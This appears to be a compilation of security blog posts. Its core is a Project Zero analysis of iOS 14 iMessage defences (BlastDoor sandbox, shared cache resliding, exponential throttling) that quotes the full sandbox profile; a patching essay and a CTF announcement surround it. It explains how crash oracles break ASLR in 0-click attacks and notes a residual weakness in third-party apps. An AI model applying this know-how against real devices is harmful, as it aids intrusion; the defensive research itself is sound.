When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes.

Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done. 

Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.

While the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.

In 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny. We hope to also expand our work into variant analysis work on other vulnerabilities as well. We hope more researchers will join us in this work. (If you’re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: my talk at BluehatIL 2020 and Ki Chan Ahn at OffensiveCon 2020.)

In addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone. Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.

A Look at iMessage in iOS 14

By: Ryan
28 January 2021 at 19:47

Posted By Samuel Groß, Project Zero

On December 20, Citizenlab published “The Great iPwn”, detailing how “Journalists [were] Hacked with Suspected NSO Group iMessage ‘Zero-Click’ Exploit”. Of particular interest is the following note: “We do not believe that [the exploit] works against iOS 14 and above, which includes new security protections''. Given that it is also now almost exactly one year ago since we published the Remote iPhone Exploitation blog post series, in which we described how an iMessage 0-click exploit can work in practice and gave a number of suggestions on how similar attacks could be prevented in the future, now seemed like a great time to dig into the security improvements in iOS 14 in more detail and explore how Apple has hardened their platform against 0-click attacks.

The content of this blog post is the result of a roughly one-week reverse engineering project, mostly performed on a M1 Mac Mini running macOS 11.1, with the results, where possible, verified to also apply to iOS 14.3, running on an iPhone XS. Due to the nature of this project and the limited timeframe, it is possible that I have missed some relevant changes or made mistakes interpreting some results. Where possible, I’ve tried to describe the steps necessary to verify the presented results, and would appreciate any corrections or additions.

The blog post will start with an overview of the major changes Apple implemented in iOS 14 which affect the security of iMessage. Afterwards, and mostly for the readers interested in the technical details, each of the major improvements is described in more detail while also providing a walkthrough of how it was reverse engineered. At least for the technical details, it is recommended to briefly review the blog post series from last year for a basic introduction to iMessage and the exploitation techniques used to attack it.

Overview

Memory corruption based 0-click exploits typically require at least the following pieces:

  1. A memory corruption vulnerability, reachable without user interaction and ideally without triggering any user notifications
  2. A way to break ASLR remotely
  3. A way to turn the vulnerability into remote code execution
  4. (Likely) A way to break out of any sandbox, typically by exploiting a separate vulnerability in another operating system component (e.g. a userspace service or the kernel)

With iOS 14, Apple shipped a significant refactoring of iMessage processing, and made all four parts of the attack harder. This is mainly due to three central changes:

1. The BlastDoor Service

One of the major changes in iOS 14 is the introduction of a new, tightly sandboxed “BlastDoor” service which is now responsible for almost all parsing of untrusted data in iMessages (for example, NSKeyedArchiver payloads). Furthermore, this service is written in Swift, a (mostly) memory safe language which makes it significantly harder to introduce classic memory corruption vulnerabilities into the code base.

The following diagram shows the rough new iMessage processing pipeline, with the name of the respective service process shown at the top of each box.

The iMessage processing pipeline in iOS 14 and macOS Big Sur. An iMessage arrives in apsd as a push notification from Apple’s servers. From there, it is first passed to identityservicesd, which decrypts its payload using the local iMessage private key, then to imagent. Imagent then delegates the majority of the parsing work to the BlastDoor service. Afterwards, if the iMessage contains any attachments, they are downloaded from iCloud servers by IMTransferAgent. If the iMessage contains plugin data (such as a URL with a preview image), the serialized plugin data is again processed by the BlastDoor service and a preview message is generated from it. Finally, IMDPersistenceAgent stores the iMessage into the messages database, triggers a user notification, and returns to imagent, which sends the delivery receipt to the iMessage servers and thus to the sender.

As can be seen, the majority of the processing of complex, untrusted data has been moved into the new BlastDoor service. Furthermore, this design with its 7+ involved services allows fine-grained sandboxing rules to be applied, for example, only the IMTransferAgent and apsd processes are required to perform network operations. As such, all services in this pipeline are now properly sandboxed (with the BlastDoor service arguably being sandboxed the strongest).

2. Re-randomization of the Dyld Shared Cache Region

Historically, ASLR on Apple’s platforms had one architectural weakness: the shared cache region, containing most of the system libraries in a single prelinked blob, was only randomized per boot, and so would stay at the same address across all processes. This turned out to be especially critical in the context of 0-click attacks, as it allowed an attacker, able to remotely observe process crashes (e.g. through timing of automatic delivery receipts), to infer the base address of the shared cache and as such break ASLR, a prerequisite for subsequent exploitation steps.

However, with iOS 14, Apple has added logic to specifically detect this kind of attack, in which case the shared cache is re-randomized for the targeted service the next time it is started, thus rendering this technique useless. This should make bypassing ASLR in a 0-click attack context significantly harder or even impossible (apart from brute force) depending on the concrete vulnerability.

3. Exponential Throttling to Slow Down Brute Force Attacks

To limit an attacker’s ability to retry exploits or brute force ASLR, the BlastDoor and imagent services are now subject to a newly introduced exponential throttling mechanism enforced by launchd, causing the interval between restarts after a crash to double with every subsequent crash (up to an apparent maximum of 20 minutes). With this change, an exploit that relied on repeatedly crashing the attacked service would now likely require in the order of multiple hours to roughly half a day to complete instead of a few minutes.

The remainder of this blog post will now look at each of these three changes in greater depths.

The BlastDoor Service

The new BlastDoor service and its role in the processing of iMessages can be studied by following the flow of an incoming iMessage. On the wire, a simple text iMessage would look something like this, encoded as binary plist:

{

    // Group UUID

    gid = "008412B9-A4F7-4B96-96C3-70C4276CB2BE";

    // Group protocol version

    gv = 8;

    // Chat participants

    p =     (

        "mailto:[email protected]",

        "mailto:[email protected]"

    );

    // Participants version

    pv = 0;

    // Message being replied to, usually the last message in the chat 

    r = "6401430E-CDD3-4BC7-A377-7611706B431F";

    // The plain text content

    t = "Hello World!";

    // Probably some other version number

    v = 1;

    // The rich text content    

    x = "<html><body>Hello World!</body></html>";  

}

As such, the minimal steps required to parse it are:

  1. If necessary, decompress the binary data
  2. Decode the plist from its binary serialization format
  3. Extract its various fields and ensure they have the correct type
  4. Decode the `x` key if present, using an XML decoder

Previously, all of this work happened in imagent. With iOS 14, however, it all moved into the new BlastDoor service. While the main processing flow still starts in imagent, which receives the raw but unencrypted payload bytes from identityservicesd (part of the IDS framework) in -[IMDiMessageIDSDelegate service:account:incomingTopLevelMessage:fromID:messageContext:], messages are then more or less immediately forwarded to the BlastDoor service through +[IMBlastdoor sendDictionary:withCompletionBlock:] which creates the reply handler block and then calls -[IMMessagesBlastDoorInterface diffuseTopLevelDictionary:resultHandler:]. At that point processing ends up in Swift code that deserializes the binary payload and sends it to the BlastDoor service over XPC.

Inside BlastDoor, the work mostly happens in BlastDoor.framework and MessagesBlastDoorService. As most of it is written in Swift, it is fairly unpleasant to statically reverse engineer it (no symbols, many virtual calls, swift runtime code sprinkled all over the place), but fortunately, that is also not really necessary for the purpose of this blog post. However, it is worth noting that while the high level control flow logic is written in Swift, some of the parsing steps still involve the existing ObjectiveC or C implementations. For example, XML is being parsed by libxml, and the NSKeyedArchiver payloads by the ObjectiveC implementation of NSKeyedUnarchiver.

The responses from BlastDoor can be seen by breaking on the reply handler function in imagent (the function can be found in +[IMBlastdoor sendDictionary:withCompletionBlock:] or by searching for XREFs to the string “Blastdoor response %p received (command: %hhu, guid: %@)” in IMDaemonCore.framework). A typical BlastDoor response for a simple text message is shown below:

(lldb) po $x2

TextMessage(

    metadata: BlastDoor.Metadata(

        messageGUID: D391CC96-9CC6-44C6-B827-1DEB0F252529,

        timestamp: Optional(1610108299117662350),

        wantsDeliveryReceipt: true,

        wantsCheckpointing: false,

        storageContext: BlastDoor.Metadata.StorageContext(

            isFromStorage: false, isLastFromStorage: false

        )

    ),

    messageSubType: MessageType.textMessage(BlastDoor.Message(

        plainTextBody: Optional("Hello World"),

        plainTextSubject: nil,

        content: Optional(BlastDoor.AttributedString(

            attributes: [

                BlastDoor.BaseWritingDirectionAttribute(

                    range: Range(0..<11), direction: WritingDirection.natural

                ),

                BlastDoor.MessagePartAttribute(

                    range: Range(0..<11), partNumber: 0

                )

            ],

            string: "Hello World"

        )),

        _participantDestinationIdentifiers: [

            "mailto:[email protected]",

            "mailto:[email protected]"

        ],

        attributionInfo: []

    )),

    encryptionType: BlastDoor.TextMessage.EncryptionType.pair_ec,

    replyToGUID: Optional(6401430E-CDD3-4BC7-A377-7611706B431F),

    _threadIdentifierGUID: nil,

    _expressiveSendStyleIdentifier: nil,

    _groupID: Optional("008412B9-A4F7-4B96-96C3-70C4276CB2BE"),

    currentGroupName: nil,

    groupParticipantVersion: Optional(0),

    groupProtocolVersion: Optional(8),

    groupPhotoCreationTime: nil,

    messageSummaryInfo: nil,

    nicknameInformation: nil,

    truncatedNicknameRecordKey: nil

)

One can roughly associate every field in this data structure with parts of the on-wire iMessage format. For example, the plainTextBody field contains the content of the `t` field, while the content field corresponds to the content of the `x` field.

Besides simple text messages, iMessages can additionally contain attachments (essentially arbitrary files which are encrypted and temporarily uploaded to iCloud) as well as rather complex serialized NSKeyedArchiver archives, which have been the source of bugs in the past.

For these types of iMessages, the following additional parsing steps are necessary:

  1. Unpack attachment metadata (NSKeyedArchiver format)
  2. Download attachments from iCloud server
  3. Deserialize NSKeyedArchiver plugin archives and generate a preview for the notification

As an example, consider what happens when a user sends a link to a website over iMessage. In that case, the sending device will first render a preview of the webpage and collect some metadata about it (such as the title and page description), then pack those fields into an NSKeyedArchiver archive. This archive is then encrypted with a temporary key and uploaded to the iCloud servers. Finally, the link as well as the decryption key are sent to the receiver as part of the iMessage. In order to create a useful user notification about the incoming iMessage, this data has to be processed by the receiver on a 0-click code path. As that again involves a fair amount of complexity, it is also done inside BlastDoor: after receiving the BlastDoor reply from above and realizing that the message contains an attachment, imagent first instructs IMTransferAgent to download and decrypt the iCloud attachment. Afterwards, it will call into -[IMTranscodeController decodeiMessageAppPayload:bundleID:completionBlock:blockUntilReply:] which forwards the relevant data to the IMTranscoderAgent, which then proceeds into +[IMAttachmentBlastdoor sendBalloonPluginPayloadData:withBundleIdentifier:completionBlock:] and finally calls -[IMMessagesBlastDoorInterface defuseBalloonPluginPayload:withIdentifier:resultHandler:].

In the BlastDoor service, the plugin data decoding is then again performed in Swift, and dispatched to the corresponding plugin type, as determined by the plugin id. For RichLinks (plugin id com.apple.messages.URLBalloonProvider), processing ends up in LinkPresentation.MessagesPayload.init(dataRepresentation:), which deserializes the NSKeyedArchiver payload and to extract the preview image and URL metadata from it in order to generate a preview message.

Sandboxing

The sandbox profile can be found in System/Library/Sandbox/Profiles/blastdoor.sb and is also attached at the end of this blog post. It appears to be identical on iOS and macOS. The profile can be studied statically, and for that purpose is attached at the bottom of this blogpost, or dynamically, for example by using the sandbox-exec tool:

> echo "(allow process-exec (literal \"$(pwd)/test\"))" >> ./blastdoor.sb

> clang -o test test.c   # try to open files, network connections, etc.

> sandbox-exec -f ./blastdoor.sb ./test

The sandbox profile states:

;;; This profile contains the rules necessary to make BlastDoor as close to

;;; compute-only as possible, while still remaining functional.

And indeed, the sandbox profile is quite tight:

  • only a handful of local IPC services, namely diagnosticd, logd, opendirectoryd, syslogd, and notifyd, can be reached
  • almost all file system interaction is blocked
  • any interaction with IOKit drivers (historically a big source of vulnerabilities) is forbidden
  • outbound network access is denied

Furthermore, the profile makes use of syscall filtering to restrict the interactions with the core kernel. However, as of now the syscall filter seems to be in “permissive” mode:

;; To be uncommented once the system call whitelist is complete...

;; (deny syscall-unix (with send-signal SIGKILL))

As such, the BlastDoor service is still allowed to perform any syscall, but it is to be expected that the syscall filtering will soon be put into “enforcement mode”, which would further boost its effectiveness.

Crash Monitoring?

An interesting side effect of the new processing pipeline is that imagent is now able to detect when an incoming message caused a crash in BlastDoor (it will receive an XPC error). Even more interesting is the fact that imagent appears to be informing Apple’s servers about such events, as can be seen by setting a breakpoint on -[APSConnectionServer handleSendOutgoingMessage:] in apsd, the daemon responsible for implementing Apple’s push services (on top of which iMessage is built). Displaying the outgoing message will show the following:

(lldb) po [$x2 dictionaryRepresentation]

{

    APSCritical = 1;

    APSMessageID = 543;

    APSMessageIdentifier = 1520040396;

    APSMessageTopic = "com.apple.madrid";

    APSMessageUserInfo =     {

        c = 115;

        fR = 13500;

        fRM = "c-100-BlastDoor.Explosion-1-com.apple.BlastDoor.XPC-ServiceCrashed";

        fU = {length = 16, bytes = 0x3a4912626c9645f98cb26c7c2d439520};

        i = 1520040396;

        nr = 1;

        t = {length = 32, bytes = ... };

        ua = "[macOS,11.1,20C69,Macmini9,1]";

        v = 7;

    };

    APSOutgoingMessageSenderTokenName = 501;

    APSPayloadFormat = 1;

    APSTimeout = 120;

    APSTimestamp = "2021-01-06 19:52:10 +0000";

}

As can be seen, imagent is apparently informing the iMessage servers that the message with the UUID 0x3a4912626c9645f98cb26c7c2d439520 (fU key) has caused a crash in BlastDoor.

It is unclear what the purpose of this is without access to the server’s code. While these notifications may simply be used for statistical purposes, they would also give Apple a fairly clear signal about attacks against iMessage involving brute-force and a somewhat weaker signal about any failed exploits against the BlastDoor service.

In my experiments, after observing one of these crash notifications, the server would start directly sending delivery receipts to the sender for messages that hadn't actually been processed by the receiver yet. Possibly this is another, independent effort to break the crash oracle technique by confusing the sender, but that is hard to verify without access to the code running on the server. In any case, it is worth noting that this “spoofing” of delivery receipts by the server is generally possible as the message UUID, which is more or less the only content of a delivery receipt, is part of the non-end2end encrypted payload and is thus known to the server (break on -[APSConnectionServer handleSendOutgoingMessage:] and inspect outgoing iMessages to verify this, the UUID will be in the U key, while the e2e-encrypted data will be in the P key). This is most likely necessary so the server can track which messages have already been delivered and which ones it still needs to keep around for delivery in the future.

Shared Cache Resliding

Previously, when exploiting an iMessage memory corruption bug, a “crash oracle” could be used to reveal the location of the shared cache region in memory: the attacker would trigger the memory corruption bug in a way that would cause an access to a memory location somewhere in the region 0x180000000 - 0x280000000 (where the shared cache can be mapped). If the memory was valid, no crash would occur and imagent would then send a delivery receipt to the attacker. However, If a crash occurred, no such receipt would be delivered, informing the attacker that the address was unmapped. Through clever selection of the queried addresses, the location of the shared cache could be revealed in logarithmic time, with only about 20 messages.

However, with iOS 14 Apple has added a mechanism to re-randomize the location of the shared cache region for an “attacked” process, thus breaking a fundamental assumption of this technique and rendering it ineffective. This is significant as the crash oracle technique was one of very few, if not the only, fairly generic ASLR bypass techniques usable in 0-click iMessage attacks.

To understand how the shared cache resliding works, one can start by looking at the kernel. In iOS 14, the kernel can now have two active shared cache regions: the “regular” region and a “reslided” region. During an attack, the following then happens:

  1. When an attacker attempts to use a crash-oracle-based technique, the attacked process would quickly end up accessing unmapped memory in the range 0x180000000 - 0x280000000 (where the shared cache is mapped) and crashes
  2. The kernel handles the segmentation fault generated by the CPU, and sets a specific flag in the crash info that signals that the crash happened inside the shared cache region
  3. At the same time, the kernel will mark the currently active reslided shared cache region (if one exists) as stale, causing it to be recreated and thus re-randomized the next time it is used
  4. launchd (as the parent process of the crashed service) receives the crash info, notices the OS_REASON_FLAG_SHAREDREGION_FAULT flag, and sets the ReslideSharedCache property on the service associated with the crashed process (see `launchctl procinfo $pid` and search for `reslide shared cache = 1`)
  5. The next time the service is restarted, launchd then adds the POSIX_SPAWN_RESLIDE attribute for posix_spawn due to the ReslideSharedCache property
  6. In the kernel, this flag now causes the newly created process to be given the reslided shared cache image. However, as no active reslided region currently exists (the previous one was marked as stale in step 3.), a new one is created at a newly randomized address.

The result of this is that whenever an attacker attempts to use a crash-oracle to break ASLR, the attacked service would receive a different shared cache region every time it is launched, thus preventing the attack from succeeding. For the time being, this feature appears to only be active on iOS though, but it would be expected to come to macOS as well.

While this mechanism would in principle also protect 3rd party apps from similar attacks, protection for those is currently somewhat weaker, likely in order to first evaluate the real-world performance impact of this change (the shared cache is a significant performance optimization of the OS). In particular, step 3 is currently only performed if the crashing process is a platform binary (essentially binaries that ship with the OS and are directly signed by Apple) such as the services handling iMessages. However, for 3rd party processes, it would only happen if the global vm_shared_region_reslide_restrict is set to zero:

/*

 * Flag to control what processes should get shared cache randomize resliding

 * after a fault in the shared cache region:

 *

 * 0 - all processes get a new randomized slide

 * 1 - only platform processes get a new randomized slide

 */

Which is controlled by the vm_shared_region_reslide_restrict bootarg. This currently seems to be set to one. In essence, for 3rd party apps this means:

  1. When the attacked process first crashes, the kernel will still set the OS_REASON_FLAG_SHAREDREGION_FAULT flag, and launchd will add the ReslideSharedCache property, but the current reslided region won’t be invalidated
  2. The restarted service is then restarted and now uses the “reslided” shared cache region
  3. When the service crashes the next time, and if that service is the only one currently using the reslided shared cache region (which should usually be the case, but could possibly be influenced by the attacker), the region’s refcount drops to zero, and the shared cache region is marked for removal.
  4. However, removal will only actually happen after two minutes. As such, if the service is restarted within two minutes, it will receive the same shared cache region at the same location in memory.

As a result, a third-party app could still be attacked through a crash-oracle technique if it automatically sends some form of delivery receipt to the sender and restarts quickly enough after a crash. This could, however, be prevented for example by enabling ExponentialThrottling for these services. Ideally, and assuming that the performance penalty is reasonable, Apple would enable re-randomization for all apps in the future.

Exponential Throttling

Another thing we suggested back in 2019 was to limit the number of attempts an attacker gets when attempting to exploit a vulnerability. This was mostly important to defend against the crash-oracle technique, but would also help to prevent brute force attacks (e.g., given enough attempts, one could simply brute force the location of the shared cache region). The new ExponentialThrottling feature in launchd seems to achieve just that.

To use it, a system daemon or agent has to opt-in by setting "_ExponentialThrottling = 1” in its Info.plist (essentially the service metadata), as can be seen below for the BlastDoor service:

> plutil -p /System/Library/PrivateFrameworks/MessagesBlastDoorSupport.framework/Versions/A/XPCServices/MessagesBlastDoorService.xpc/Contents/Info.plist

{

  "CFBundleDisplayName" => "MessagesBlastDoorService"

  "CFBundleExecutable" => "MessagesBlastDoorService"

  "CFBundleIdentifier" => "com.apple.MessagesBlastDoorService"

  ...

  "XPCService" => {

    "_ExponentialThrottling" => 1

  }

}

Apart from the BlastDoor service, it is also used for imagent:

> plutil -p /System/Library/LaunchAgents/com.apple.imagent.plist

{

  "_ExponentialThrottling" => 1

  ...

but doesn’t appear to be used for any other service, as can, for example, be seen by looking at the output of the launchctl dumpstate command, which will only show “exponential throttling = 1” for com.apple.imagent and com.apple.MessagesBlastDoorService.

Presumably, the _ExponentialThrottling property instructs launchd (the macOS and iOS init process), to delay subsequent restarts of a crashing service. While it is somewhat challenging to statically reverse engineer launchd due to the lack of source code or binary symbols, it is fortunately fairly easy to experimentally determine the impact of the _ExponentialThrottling property, for example by installing a custom daemon that writes the current timestamp to a file before crashing. By default, so without ExponentialThrottling, one would see the following:

Service started on Wed Jan  6 13:56:03 2021

Service started on Wed Jan  6 13:56:13 2021

Service started on Wed Jan  6 13:56:23 2021

Service started on Wed Jan  6 13:56:33 2021

As can be seen, by default, a service is, at the earliest, restarted ten seconds after it was previously started. However, using the following service plist which enables ExponentialThrottling:

> # Start service with

> # launchctl bootstrap system /Library/LaunchDaemons/net.saelo.test.plist

> plutil -p /Library/LaunchDaemons/net.saelo.test.plist

{

  "_ExponentialThrottling" => 1

  "KeepAlive" => 1

  "Label" => "net.saelo.test"

  "POSIXSpawnType" => "Interactive"

  "Program" => "/path/to/program"

}

One can observe the following:

Service started on Wed Jan  6 10:42:43 2021

Service started on Wed Jan  6 10:42:53 2021 (+10s)

Service started on Wed Jan  6 10:43:03 2021 (+10s)

Service started on Wed Jan  6 10:43:13 2021 (+10s)

Service started on Wed Jan  6 10:43:33 2021 (+20s)

Service started on Wed Jan  6 10:44:13 2021 (+40s)

Service started on Wed Jan  6 10:45:33 2021 (+80s)

Service started on Wed Jan  6 10:48:13 2021 (+160s [~2.5m])

Service started on Wed Jan  6 10:53:33 2021 (+320s [~5m])

Service started on Wed Jan  6 11:04:13 2021 (+640s [~10m])

Service started on Wed Jan  6 11:24:13 2021 (+20m)

Service started on Wed Jan  6 11:44:13 2021 (+20m)

Service started on Wed Jan  6 12:04:13 2021 (+20m)

Here, the exponential increase in the time between subsequent restarts is clearly visible, and goes up to an apparent maximum of 20 minutes. And indeed, launchd does contain the following bit of code in a function presumably responsible for computing the next restart delay (search for XREFs to the string "%s: service throttled by %llu seconds"):

  if ( delay >= 1200 )

    result = 1200LL;                 // 20 minutes

  else

    result = delay;

With this change, an exploit that relied on brute force would now only get one attempt every 20 minutes instead of every 10 seconds.

(Upcoming?) ObjectiveC ISA PAC

The PoC exploit against iMessage on iOS 12.4 relied heavily on faking ObjectiveC objects to gain a form of arbitrary code execution despite the presence of pointer authentication (PAC). This was mainly possible because the ISA field, containing the pointer to the Class object and thus making a piece of memory appear like a valid ObjectiveC object, was not protected through PAC and could thus be faked. With iOS 14, this now seems to be changing: while previously, the top 19 bits of the ISA value contained the inline refcount, it now appears that this field has been reduced to 9 bits (of which the LSB appears to be reserved for some purpose, leaving an 8-bit inline refcount, see the bit shifting logic in objc_release or objc_retain), while the freed-up bits now hold a PAC, as can be seen in objc_rootAllocWithZone in libobjc.dylib:

    ; Allocate the object

    BL              j__calloc_3

    CBZ             X0, loc_1953DA434

    MOV             X8, X0

    ; “Tag” the address with a constant to get a PAC modifier value

    MOVK            X8, #0x6AE1,LSL#48        

    MOV             X9, X19

    ; Compute PAC of Class pointer with tagged object address as modifier

    PACDA           X9, X8

    ; Clear top 9 bits (inline refcnt) and bottom 3 bits (other bitfields)       

    AND             X8, X9, #0x7FFFFFFFFFFFF8

    ; Set LSB and inline refcount to one

    MOV             X9, #0x100000000000001

    ORR             X9, X8, X9

    ; Presumably, the refcnt isn’t used for all types of classes...

    TST             W20, #0x2000

    CSEL            X8, X9, X8, EQ

    ; Store the resulting value into the ISA field

    STR             X8, [X0]

However, currently the ISA PAC appears to never be checked, as such, it doesn’t yet affect any exploits. The most likely reason for this is that the ISA PAC feature is being rolled out in multiple phases, with the current implementation meant to allow in-depth performance evaluation, in particular of the reduced size of the inline refcount, which will likely cause more objects to use the more expensive out-of-line refcounting (used once the inline refcount saturates). With that, it can be expected that, in the absence of major performance issues, future releases of iOS and macOS will use PAC for the ObjC ISA field, thus likely breaking exploits that have to rely on faking ObjectiveC objects to achieve arbitrary code execution.

Conclusion

This blog post discussed three improvements in iOS 14 affecting iMessage security: the BlastDoor service, resliding of the shared cache, and exponential throttling. Overall, these changes are probably very close to the best that could’ve been done given the need for backwards compatibility, and they should have a significant impact on the security of iMessage and the platform as a whole. It’s great to see Apple putting aside the resources for these kinds of large refactorings to improve end users’ security. Furthermore, these changes also highlight the value of offensive security work: not just single bugs were fixed, but instead structural improvements were made based on insights gained from exploit development work.

As for the alleged NSO iMessage exploit, it may have been prevented from working against iOS 14 by any of the following:

  • The bug was fixed in iOS 14, for example due to the rewrite of large parts of the iMessage processing pipeline in Swift
  • The mere fact that processing happens in a different process, which could for example break a heap layouting primitive
  • The shared cache resliding would break their exploit if their exploit relied on some form of crash oracle to break ASLR
  • The stronger sandbox of the BlastDoor service, which could prevent the exploitation of a privilege escalation vulnerability after compromising the BlastDoor process

While these are some possible scenarios, and it could be the case that the exploit “just” needs some re-engineering to function again, the fact that these security improvements were shipped is certainly a positive outcome.

Attachment 1: blastdoor.sb

;;; This profile contains the rules necessary to make BlastDoor as close to

;;; compute-only as possible, while still remaining functional.

;;;

;;; For all platforms: /System/Library/PrivateFrameworks/MessagesBlastDoorSupport.framework/XPCServices/MessagesBlastDoorService.xpc/MessagesBlastDoorService

(version 1)

;;; -------------------------------------------------------------------------------------------- ;;;

;;; Basic Rules

;;; -------------------------------------------------------------------------------------------- ;;;

;; Deny all default rules.

(deny default)

(deny file-map-executable process-info* nvram*)

(deny dynamic-code-generation)

;; Rules copied from system.sb. Ones that we've deemed overly permissive

;; or unnecessary for BlastDoor have been removed.

;; Allow read access to standard system paths.

(allow file-read*

       (require-all (file-mode #o0004)

                    (require-any (subpath "/System")

                                 (subpath "/usr/lib")

                                 (subpath "/usr/share")

                                 (subpath "/private/var/db/dyld"))))

(allow file-map-executable

       (subpath "/System/Library/CoreServices/RawCamera.bundle")

       (subpath "/usr/lib")

       (subpath "/System/Library/Frameworks"))

(allow file-test-existence (subpath "/System"))

(allow file-read-metadata

       (literal "/etc")

       (literal "/tmp")

       (literal "/var")

       (literal "/private/etc/localtime"))

;; Allow access to standard special files.

(allow file-read*

       (literal "/dev/random")

       (literal "/dev/urandom"))

(allow file-read* file-write-data

       (literal "/dev/null")

       (literal "/dev/zero"))

(allow file-read* file-write-data file-ioctl

       (literal "/dev/dtracehelper"))

;; TODO: Don't allow core dumps to be written out unless this is on a dev

;; fused device?

(allow file-write*

       (require-all (regex #"^/cores/")

                    (require-not (file-mode 0))))

;; Allow IPC to standard system agents.

(allow mach-lookup

       (global-name "com.apple.diagnosticd")

       (global-name "com.apple.logd")

       (global-name "com.apple.system.DirectoryService.libinfo_v1")

       (global-name "com.apple.system.logger")

       (global-name "com.apple.system.notification_center"))

;; Allow mostly harmless operations.

(allow signal process-info-dirtycontrol process-info-pidinfo

       (target self))

;; Temporarily allow sysctl-read with reporting to see if this is

;; used for anything.

(allow (with report) sysctl-read)

;; We don't need to post any darwin notifications.

(deny darwin-notification-post)

;; We shouldn't allow any other file operations not covered under

;; the default of deny above.

(deny file-clone file-link)

;; Don't deny file-test-existence: <rdar://problem/59611011>

;; (deny file-test-existence)

;; Don't allow access to any IOKit properties.

(deny iokit-get-properties)

(deny mach-cross-domain-lookup)

;; Don't allow BlastDoor to spawn any other XPC services other than

;; ones that we can intentionally whitelist later.

(deny mach-lookup (xpc-service-name-regex #".*"))

;; Don't allow any commands on sockets.

(deny socket-ioctl)

;; Denying this should have no ill effects for our use case.

(deny system-privilege)

;; To be uncommented once the system call whitelist is complete...

;; (deny syscall-unix (with send-signal SIGKILL))

(allow syscall-unix

       (syscall-number SYS_exit)

       (syscall-number SYS_kevent_qos)

       (syscall-number SYS_kevent_id)

       (syscall-number SYS_thread_selfid)

       (syscall-number SYS_bsdthread_ctl)

       (syscall-number SYS_kdebug_trace64)

       (syscall-number SYS_getattrlist)

       (syscall-number SYS_sigsuspend_nocancel)

       (syscall-number SYS_proc_info)

       

       (syscall-number SYS___disable_threadsignal)

       (syscall-number SYS___pthread_sigmask)

       (syscall-number SYS___mac_syscall)

       (syscall-number SYS___semwait_signal_nocancel)

       (syscall-number SYS_abort_with_payload)

       (syscall-number SYS_access)

       (syscall-number SYS_bsdthread_create)

       (syscall-number SYS_bsdthread_terminate)

       (syscall-number SYS_close)

       (syscall-number SYS_close_nocancel)

       (syscall-number SYS_connect)

       (syscall-number SYS_csops_audittoken)

       (syscall-number SYS_csrctl)

       (syscall-number SYS_fcntl)

       (syscall-number SYS_fsgetpath)

       (syscall-number SYS_fstat64)

       (syscall-number SYS_fstatfs64)

       (syscall-number SYS_getdirentries64)

       (syscall-number SYS_geteuid)

       (syscall-number SYS_getfsstat64)

       (syscall-number SYS_getgid)

       (syscall-number SYS_getrlimit)

       (syscall-number SYS_getuid)

       (syscall-number SYS_ioctl)

       (syscall-number SYS_issetugid)

       (syscall-number SYS_lstat64)

       (syscall-number SYS_madvise)

       (syscall-number SYS_mmap)

       (syscall-number SYS_munmap)

       (syscall-number SYS_mprotect)

       (syscall-number SYS_mremap_encrypted)

       (syscall-number SYS_open)

       (syscall-number SYS_open_nocancel)

       (syscall-number SYS_openat)

       (syscall-number SYS_pathconf)

       (syscall-number SYS_pread)

       (syscall-number SYS_read)

       (syscall-number SYS_readlink)

       (syscall-number SYS_shm_open)

       (syscall-number SYS_socket)

       (syscall-number SYS_stat64)

       (syscall-number SYS_statfs64)

       (syscall-number SYS_sysctl)

       (syscall-number SYS_sysctlbyname)

       (syscall-number SYS_workq_kernreturn)

       (syscall-number SYS_workq_open)

)

;; Still allow the system call but report in log.

(allow (with report) syscall-unix)

;; For validating the entitlements of clients. This is so only entitled

;; clients can pass data into a BlastDoor instance.

(allow process-info-codesignature)

;;; -------------------------------------------------------------------------------------------- ;;;

;;; Reading Files

;;; -------------------------------------------------------------------------------------------- ;;;

;; Support for BlastDoor receiving sandbox extensions from clients to either read files, or

;; write to a target location.

;; com.apple.app-sandbox.read

(allow file-read*

       (extension "com.apple.app-sandbox.read"))

;; com.apple.app-sandbox.read-write

(allow file-read* file-write*

       (extension "com.apple.app-sandbox.read-write"))

McAfee ATR Launches Education-Inspired Capture the Flag Contest!

27 January 2021 at 16:00

McAfee’s Advanced Threat Research team just completed its second annual capture the flag (CTF) contest for internal employees. Based on tremendous internal feedbackwe’ve decided to open it up to the public, starting with a set of challenges we designed in 2019.  

We’ve done our best to minimize guesswork and gimmicks and instead of flashy graphics and games, we’ve distilled the kind of problems we’ve encountered many times over the years during our research projects. Additionally, as this contest is educational in nature, we won’t be focused as much on the winners of the competition. The goal is for anyone and everyone to learn something new. However, we will provide a custom ATR challenge coin to the top 5 teams (one coin per team). All you need to do is score on 2 or more challenges to be eligible. When registering for the contest, make sure to use a valid email address so we can contact you.  

The ATR CTF will open on Friday, February 5th at 12:01pm PST and conclude on Thursday, February 18th, at 11:59pm PST.  

Click Here to Register! 

​​​​​​​If you’ve never participated in a CTF before, the concept is simple. You will: 

  • Choose the type of challenge you want to work on, 
  • Select a difficulty level by point value, 
  • Solve the challenge to find a ‘flag,’ and 
  • Enter the flag for the corresponding points.​​​​​

NOTE: The format of all flags is ATR[], placing the flag,  between the square brackets. For example: ATR[1a2b3c4d5e]. The flag must be submitted in full, including the ATR and square bracket parts.
 

The harder the challenge, the higher the points!  Points range from 100 to 500. All CTF challenges are designed to practice real-world security concepts, and this year’s categories include: 

  • Reverse engineering 
  • Exploitation 
  • Web 
  • Hacking Tools 
  • Crypto 
